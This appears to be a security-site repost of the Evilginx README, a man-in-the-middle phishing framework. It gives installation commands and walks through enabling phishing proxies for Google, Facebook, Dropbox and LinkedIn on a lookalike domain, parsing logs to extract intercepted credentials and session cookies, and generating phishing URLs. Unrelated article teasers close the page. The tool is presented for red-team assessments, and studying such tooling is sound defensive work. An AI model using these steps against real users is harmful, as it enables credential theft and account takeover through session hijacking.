python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ
Evilginx is a Man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It’s core runs on Nginx HTTP server, which utilizes proxy_pass
and sub_filter
to proxy and modify HTTP content, while intercepting traffic between client and server.
Evilginx provides an installation script install.sh
that takes care of installing the whole package on any Debian wheezy/jessie machine, in fire and forget manner.
Also Read Ghost Phisher – Wireless & Ethernet Attack Software Application
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v1.0
usage: evilginx.py [-h] {setup,parse,genurl} ...
positional arguments:
{setup,parse,genurl}
setup Configure Evilginx.
parse Parse log file(s).
genurl Generate phishing URL.
optional arguments:
-h, --help show this help message and exit
Enable or disable site configurations for use with Nginx server, using supplied Evilginx templates from sites
directory.
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
(-l | --enable ENABLE | --disable DISABLE)
optional arguments:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Your phishing domain.
-y Answer all questions with 'Yes'.
-l, --list List available supported apps.
--enable ENABLE Enable following site by name.
--disable DISABLE Disable following site by name.
List available site configuration templates:
python evilginx.py setup -l
Listing available supported sites:
- dropbox (/root/evilginx/sites/dropbox/config)
subdomains: www
- google (/root/evilginx/sites/google/config)
subdomains: accounts, ssl
- facebook (/root/evilginx/sites/facebook/config)
subdomains: www, m
- linkedin (/root/evilginx/sites/linkedin/config)
subdomains: www
Enable google phishing site with preregistered phishing domain not-really-google.com
:
python evilginx.py setup --enable google -d not-really-google.com
Disable facebook phishing site:
python evilginx.py setup --disable facebook
Parse Nginx logs to extract intercepted login credentials and session cookies. Logs, by default, are saved in logs
directory, where evilginx.py
script resides. This can be done automatically after you enable auto-parsing in the Setup phase.
usage: evilginx.py parse [-h] -s SITE [--debug]
optional arguments:
-h, --help show this help message and exit
-s SITE, --site SITE Name of site to parse logs for ('all' to parse logs
for all sites).
--debug Does not truncate log file after parsing.
Parse logs only for google site:
python evilginx.py parse -s google
Parse logs for all available sites:
python evilginx.py parse -s all
Generate phishing URLs that you can use in your Red Team Assessments.
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT
optional arguments:
-h, --help show this help message and exit
-s SITE, --site SITE Name of site to generate link for.
-r REDIRECT, --redirect REDIRECT
Redirect user to this URL after successful sign-in.
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ
Generated following phishing URLs:
Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…
This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…
GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…
Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…
The free and open-source security platform SecHub, provides a central API to test software with…
Don't worry if there are any bugs in the tool, we will try to fix…